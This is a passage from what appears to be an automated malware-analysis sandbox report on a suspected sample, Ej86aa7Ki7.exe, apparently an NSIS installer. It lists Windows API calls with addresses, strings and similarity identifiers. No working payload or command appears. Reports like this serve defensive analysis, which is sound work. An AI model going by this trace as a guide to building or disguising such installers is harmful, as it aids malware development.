          • Part of subcall function 00405371: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,00000000,00000000,00000000), ref: 004053CC
          • Part of subcall function 00405371: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\,C:\Users\user\AppData\Local\Temp\nswF8FA.tmp\), ref: 004053DE
          • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
          • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
          • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
        • CreateDialogParamW.USER32(0000006F,00000000,00402D98,00000000), ref: 00402EBE
        • ShowWindow.USER32(00000000,00000005), ref: 00402ECC
          • Part of subcall function 00402E17: MulDiv.KERNEL32(0033DE75,00000064,00342E93), ref: 00402E2C
        Similarity
        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
        • String ID: ... %d%%
        • API String ID: 722711167-2449383134
        APIs
        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404C56
        • GetMessagePos.USER32 ref: 00404C5E
        • ScreenToClient.USER32(?,?), ref: 00404C78
        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C8A
        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404CB0
        Similarity
        • API ID: Message$Send$ClientScreen
        • String ID: f
        • API String ID: 41195575-1993550816
        APIs
        • GetDC.USER32(?), ref: 00401DB6
        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
        • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
        • ReleaseDC.USER32(?,00000000), ref: 00401DE9
        • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401E38
        Similarity
        • API ID: CapsCreateDeviceFontIndirectRelease
        • String ID: Tahoma
        • API String ID: 3808545654-3580928618
        APIs
        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DB6
        • wsprintfW.USER32 ref: 00402DEA
        • SetWindowTextW.USER32(?,?), ref: 00402DFA
        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E0C
        Similarity
        • API ID: Text$ItemTimerWindowwsprintf
        • String ID: unpacking data: %d%%$verifying installer: %d%%
        • API String ID: 1451636040-1158693248
        APIs
        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402917
        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402933
        • GlobalFree.KERNEL32(?), ref: 0040296C
        • GlobalFree.KERNEL32(00000000), ref: 0040297F
        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402997
        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 004029AB
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Global$AllocFree$CloseDeleteFileHandle
        • String ID:
        • API String ID: 2667972263-0
        APIs
        • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
        • wsprintfW.USER32 ref: 00404BD7
        • SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ItemTextlstrlenwsprintf
        • String ID: %u.%u%s%s$(7B
        • API String ID: 3540041739-1320723960
        APIs
        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402CB4
        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402CF0
        • RegCloseKey.ADVAPI32(?), ref: 00402CF9
        • RegCloseKey.ADVAPI32(?), ref: 00402D1E
        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402D3C
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Close$DeleteEnumOpen
        • String ID:
        • API String ID: 1912718029-0
        APIs
        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: MessageSend$Timeout
        • String ID: !
        • API String ID: 1777923405-2657877971
        APIs
        • WideCharToMultiByte.KERNEL32(?,?,0040B5D8,000000FF,loyolism,00000400,?,?,00000021), ref: 004025FE
        • lstrlenA.KERNEL32(loyolism,?,?,0040B5D8,000000FF,loyolism,00000400,?,?,00000021), ref: 00402609
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: ByteCharMultiWidelstrlen
        • String ID: loyolism
        • API String ID: 3109718747-2838521280
        APIs
        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BCC
        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403437,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405BD6
        • lstrcatW.KERNEL32(?,0040A014), ref: 00405BE8
        Strings
        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC6
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CharPrevlstrcatlstrlen
        • String ID: C:\Users\user\AppData\Local\Temp\
        • API String ID: 2659869361-823278215
        APIs
        • SetWindowTextW.USER32(00000000,00429240), ref: 00403DC9
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: TextWindow
        • String ID: "C:\Users\user\Desktop\Ej86aa7Ki7.exe"$1033
        • API String ID: 530164218-1872632071
        APIs
        • IsWindowVisible.USER32(?), ref: 00405314
        • CallWindowProcW.USER32(?,?,?,?), ref: 00405365
          • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Window$CallMessageProcSendVisible
        • String ID:
        • API String ID: 3748168415-3916222277
        APIs
        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ej86aa7Ki7.exe,C:\Users\user\Desktop\Ej86aa7Ki7.exe,80000000,00000003), ref: 00405C18
        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Ej86aa7Ki7.exe,C:\Users\user\Desktop\Ej86aa7Ki7.exe,80000000,00000003), ref: 00405C28
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CharPrevlstrlen
        • String ID: C:\Users\user\Desktop
        • API String ID: 2709904686-1246513382
        APIs
        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D74
        • CharNextA.USER32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D85
        • lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
        Memory Dump Source
        • Source File: 00000000.00000002.2060434744.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: lstrlen$CharNextlstrcmpi
        • String ID:
        • API String ID: 190613189-0